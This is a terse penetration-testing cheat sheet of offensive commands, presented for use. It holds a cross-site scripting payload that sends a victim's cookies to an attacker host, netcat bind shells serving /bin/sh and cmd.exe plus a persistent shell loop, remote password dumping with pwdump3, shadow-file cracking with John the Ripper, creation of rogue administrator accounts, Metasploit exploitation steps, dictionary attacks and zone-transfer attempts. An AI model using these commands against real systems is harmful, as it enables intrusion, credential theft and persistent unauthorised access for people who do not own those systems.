1. LINUX
  1. # gcc <exploit source> -o <outfile>
  1. compile an exploit
  2. run with ./<outfile>
  1. # whoami
  2. # id
  3. # su -
  1. become root
  1. WINDOWS
  1. c:\>enum -U [target]
  1. enumerate user accounts
  1. c:\>enum -P [target]
  1. enum password policy
  1. c:\>enum -G [target]
  1. enum groups
  1. c:\>enum -UGP [target]
  1. enum combined
  1. c:\>enum -D -u [user] -f [wordfile] [target]
  1. run dictionary attack
  1. NMAP
  1. # nmap -A <target> --reason -o <file>
  1. run “agressive” scan output to a file
  1. # nmap -p <port/s> <target> --reason
  1. scanspecific ports on target
  1. # nmap -sV -p <port/s> <target> --reason
  1. version scan
  1. --reason - show target’s response
  2. --packet_trace - shows packet details
  3. --traceroute - show network topology to target
  1. Metasploit
  1. #msfconsole
  2. > show exploits
  3. > search [parameter]
  4. > show payloads
  5. > use /path/to/exploit
  6. > set PAYLOAD /path/to/payload
  7. > show options
  8. > set RHOST <target-ip>
  9. > exploit
  10. > sessions -l
  11. > sessions -i <session-id>
  1. Hydan
  1. # echo “Hello” > hideme.txt
  2. # ./hydan ./ls hideme.txt > <outfile>
  1. hide
  1. ./ hydan-decode <stegofile>
  1. decode
  2. enter passwd when prompted
  1. DNS Interegation
  1. c:\>nslookup
  2. >server <dns-server-ip>
  3. >ls -d target.tgt
  4. # dig @<target-dns-svr-ip> target.tgt -t AXFR
  1. attempt zone transfer from linux cli
  1. CROSS-SITE Scripting Example
  1. http://website.net/search.php?word=<SCRIPT LANGUAGE=Javascript>alert(“PWNED!”);</SCRIPT>
  1. Display alert PWNED!
  1. http://website.net/search.php?word=<SCRIPT LANGUAGE=Javascript>document.location=’http://attackersite.com/cgi-bin/grub.cgi?’%2bdocument.cookie</SCRIPT>
  1. PASSWORDS DUMP
  1. c:\> pwdump3 <target-ip> [outfile] [user]
  1. (will prompt for password)
  2. dumps passwords from remote machine
  3. only if you have admin level priv on the remote
  1. John the Ripper
  1. # unshadow /etc/passwd /etc/shadow >/tmp/combined
  2. # ./john /tmp/combined
  3. c:\> john <hashfile>
  1. under windows
  1. “remember to delete “john.pot” if restarting cracking session from beginning
  1. WINDOWS Net Commands
  1. c:\>net user /add [user] [password]
  2. net localgroup administrators /add [user]
  3. net user [user] /delete
  4. net use * \\[target]\c$ [admin passwd] /u:[user]
  1. map local drive to remote with admin privs
  1. net use * \\[target]\c$ [admin passwd] /u:{target-ip]\[user]
  1. mapping to server (win2K3)
  1. net use * /d /y
  1. delete all net use sessions
  1. NETCAT
  1. # nc -lnvp 7777
  1. create listener on port 7777
  1. # nc -nv <listener-ip> 7777
  1. connect to remote listener on 7777
  1. # nc -lnvp 7777 -e /bin/sh
  1. create listener and shovel a shell on linux
  1. c:\> nc -lnvp 7777 -e cmd.exe
  1. create listener and shovel a shell on Windows
  1. # nc -lnvp 7777 <file.txt
  1. create listener, output into the file.txt
  1. nc -nv <listner-ip> 7777 >file.txt
  1. connect to listner and send a file.txt
  2. would normally require a listener with a < file.txt created
  1. # while [ 1 ]; do echo “Started”;nc -lnp [port] -e /bin/sh;done
  1. create persistant netcat listner with bash shell